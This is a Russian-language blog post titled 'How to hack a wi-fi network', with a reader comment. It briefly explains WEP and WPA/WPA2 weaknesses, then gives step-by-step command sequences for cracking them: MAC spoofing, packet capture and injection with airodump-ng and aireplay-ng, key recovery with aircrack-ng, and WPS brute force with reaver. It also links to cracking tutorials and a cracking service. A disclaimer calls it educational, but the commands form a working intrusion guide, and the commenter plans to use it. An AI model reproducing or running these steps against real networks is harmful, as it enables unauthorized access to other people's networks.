Как взломать сеть wi-fi

Это подборка материалов, соединенных в одну статью, частично дополнил комментариеями. Хотел написать большую статью, но так и не дошли руки. Т.к. материал висит в черновиках уже больше полугода, решил выложить в том виде, в каком есть.

Хочу сразу сказать одну очень важную вещь:
Я не несу никакой ответственности за ваши действия. Статья предназначена исключительно в ознакомительных целях, чтобы открыть глаза на слабость защиты большинства wi-fi сетей.

Итак, что такое wi-fi я не буду рассказывать, т.к. статья не этого уровня. На сегодня существует несколько алгоритмов обеспечения безопасности сетей wi-fi: WEP, WPA и WPA2. Ниже очень кратко об этих алгоритмах шифрования и их минусах.

WEP. Основы.

В основе WEP лежит поточный шифр RC4, выбранный из-за своей высокой скорости работы и возможности использования переменной длины ключа. Для подсчета контрольных сумм используется CRC32.
Ключи имеют длину 40 и 104 бита для WEP-40 и WEP-104 соответственно. Используются два типа ключей: ключи по умолчанию и назначенные ключи. Назначенный ключ отвечает определенной паре отправитель-получатель. Может иметь любое, заранее оговоренное сторонами значение. Если же стороны предпочтут не использовать назначенный ключ, им выдается один из четырех ключей по умолчанию из специальной таблицы. Для каждого кадра данных создается сид (англ. Seed), представляющий собой ключ с присоединенным к нему вектором инициализации.

WEP. Метод взлома.

Все атаки на WEP основаны на недостатках шифра RC4, таких, как возможность коллизий векторов инициализации и изменения кадров. Для всех типов атак требуется проводить перехват и анализ кадров беспроводной сети. В зависимости от типа атаки, количество кадров, требуемое для взлома, различно. С помощью программ, таких как Aircrack-ng, взлом беспроводной сети с WEP шифрованием осуществляется очень быстро и не требует специальных навыков.

Более детально о WEP можно почитать на соответствующей странице Wikipedia.

WPA/WPA2. Основы.

В WPA обеспечена поддержка стандартов 802.1X, а также протокола EAP (Extensible Authentication Protocol, расширяемый протокол аутентификации). Стоит заметить, что в WPA2 поддерживается шифрование в соответствии со стандартом AES (Advanced Encryption Standard, усовершенствованный стандарт шифрования), который имеет ряд преимуществ над используемым в WEP RC4, например гораздо более стойкий криптоалгоритм.

WPA2 определяется стандартом IEEE 802.11i, принятым в июне 2004 года, и призван заменить WPA. В нём реализовано CCMP и шифрование AES, за счет чего WPA2 стал более защищённым, чем свой предшественник. С 13 марта 2006 года поддержка WPA2 является обязательным условием для всех сертифицированных Wi-Fi устройств.

WPA/WPA2. Метод взлома.

На данный момент основными методами взлома WPA2 PSK являются атака по словарю и брут-форс. Для этого в режиме мониторинга беспроводной карты сканируется эфир и записываются необходимые пакеты. Далее проводится деавторизация клиента для захвата начального обмена пакетами (handshake), либо нужно ждать пока клиент совершит подключение. После этого уже нет необходимости находиться недалеко от атакуемой точки доступа. Атака проводится оффлайн с помощью специальной программы и файла с хэндшейком.

Более детально о WPA и WPA2 можно почитать на соответствующей странице Wikipedia.

WEP

Выводим информацию о интерфейсе

# airmon-ng

Меняем мак

# airmon-ng stop (interface)
# ifconfig (interface) down
# macchanger --mac 00:11:22:33:44:55 (interface)
# airmon-ng start (interface)

Выводим список доступных сетей с их BSSID и ESSID

# airodump-ng (interface)

«Слушаем» выбранную сеть

# airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

В отдельном окне вводим и ждем пока не появится сообщение Association successful

# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Далее вводим и ждем, пока значение #Data не превысит хотя бы 10 000 (возможно потребуется и больше)

# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Как только значение #Data достигло необходимого уровня, в новом окне вводим

# aircrack-ng -b (bssid) (file name-01.cap)

WPA с WPS

# iwconfig
# airmon-ng start (interface)

Выводим список доступных сетей с их BSSID и ESSID

# airodump-ng (interface)

Вводим это и ждем… долго ждем…

# reaver -i (interface) -b (bssid) -vv

Как подключиться к Wi-Fi

Когда я тестировал свою сеть с WPA2, у меня под рукой не было флешки, куда я мог скачать словарь или скинуть файл с хэндшейком. Пришлось подключаться к wi-fi сетке.

Выводим список доступных сетей для подключения, подключаемся к открытой сети с именем wifi-network, получаем IP:

# iwlist wlan0 scanning|grep -i 'essid'
# iwconfig wlan0 essid 'wifi-network'
# iwconfig wlan0 key open
# dhclient wlan0

Или если сеть с WEP-шифрованием, то вот так:

# iwconfig wlan0 key 1234-5678-9101-1213

Для сети с шифрованием WPA/WPA2 надо сгенерировать ключ и сохранить его в файл

# /usr/bin/wpa_passphrase   | tee -a 

Устанавливаем подключение и получаем IP:

# /sbin/wpa_supplicant wpa_supplicant -d wext -i wlan0 -c  -B
# dhclient wlan0

-d wext — поддержка сетевых карт, у которых драйвера совместимы с Wireless Extension API в Linux
-B — запускаем в фоновом режиме

Полезные ссылки

  1. https://www.cloudcracker.com/
  2. http://www.aircrack-ng.org/doku.php?id=cracking_wpa — Tutorial: How to Crack WPA/WPA2
  3. http://www.aircrack-ng.org/doku.php?id=simple_wep_crack — Tutorial: Simple WEP Crack

2 комментария

  1. очень интересная статья, был бы wi-fi адаптер с радостью попробовал бы, так что пошел искать его))) кстати хорошо будет если кто подкинет онлайн сервис по бруту wpa ключей.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *